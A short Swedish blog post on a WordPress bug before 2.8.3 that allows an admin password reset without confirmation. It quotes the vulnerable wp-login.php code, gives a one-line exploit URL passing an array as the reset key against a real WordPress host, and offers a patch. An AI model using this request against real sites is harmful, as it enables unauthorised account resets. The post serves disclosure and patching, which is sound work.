WordPress exploit
Idag släpptes en PoC på en bugg i alla WordPress under 2.8.3, så alla är sårbara.
Den går ut på att du kan resetta admin lösenordet utan någon som helst konfirmation.
Nedan är källkoden som är sårbar:
wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
global $wpdb;$key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);
if ( empty( $key ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));$user = $wpdb->get_row($wpdb->prepare(”SELECT * FROM $wpdb->users WHERE user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));
…[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ‘login’;
$errors = new WP_Error();if ( isset($_GET['key']) )
$action = ‘resetpass’;// validate action so as to default to the login screen
if ( !in_array($action, array(‘logout’, ‘lostpassword’, ‘retrievepassword’, ‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false === has_filter(‘login_form_’ . $action) )
$action = ‘login’;
…[snip]….line 370:
break;
case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET['key']);if ( ! is_wp_error($errors) ) {
wp_redirect(‘wp-login.php?checkemail=newpass’);
exit();
}wp_redirect(‘wp-login.php?action=lostpassword&error=invalidkey’);
exit();break;
…[snip ]…
Och för att utnyttja det så ger du den bara en array.
Vilket kan göras så här http://sv.wordpress.org/wp-login.php?action=rp&key[]=
Nu får det nästan ta och vara bra med buggar i WordPress ett tag tycker jag.
Läs mer här på milw0rm
För att patcha din wordpress så detta ”hack” inte fungerar öppna wp-login.php och sök efter denna rad:
if (empty($key))
Och ersätt den med denna rad:
if(empty($key) || is_array($key))
Du är nu förhoppningsvis säker en stund, notera att ovan ej är släppt av wordpress själva.
Kommentarer